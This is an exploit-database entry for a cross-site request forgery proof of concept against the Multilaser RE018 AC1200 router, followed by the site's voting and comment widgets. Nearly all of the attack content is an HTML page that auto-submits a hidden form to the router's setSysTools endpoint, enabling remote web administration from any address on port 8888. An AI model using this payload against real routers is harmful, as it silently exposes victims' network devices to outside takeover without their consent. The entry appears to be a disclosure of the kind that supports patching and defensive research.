Multilaser Router RE018 AC1200 - Cross-Site Request Forgery (Enable Remote Access)

2021.04.21

Ali Seddigh (IR)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

|===========================================================================
| # Exploit Title : Multilaser Router RE018 AC1200 - Cross-Site Request Forgery (Enable Remote Access)
|
| # Author : Ali Seddigh
|
| # Category : Web Application
|
| # Tested on : [ Windows ~> 10]
|
| # Version: Firmware V02.03.01.45_pt
|
| # Date : 2021-04-21
|===========================================================================
| # Exploit code :
<html>
<body>
<form action="http://192.168.0.1/goform/setSysTools" method="POST">
<input name="module4" value="remoteWeb" type="hidden">
<input name="remoteWebType" value="any" type="hidden">
<input name="remoteWebIP" value="" type="hidden">
<input name="remoteWebPort" value="8888" type="hidden">
<input type="submit" value="Submit request">
</form>
</body>
<script>
document.forms[0].submit();
</script>
</body>
</html>
|===========================================================================
| # Discovered By : Ali Triplex
|===========================================================================

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Multilaser Router RE018 AC1200 - Cross-Site Request Forgery (Enable Remote Access)

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.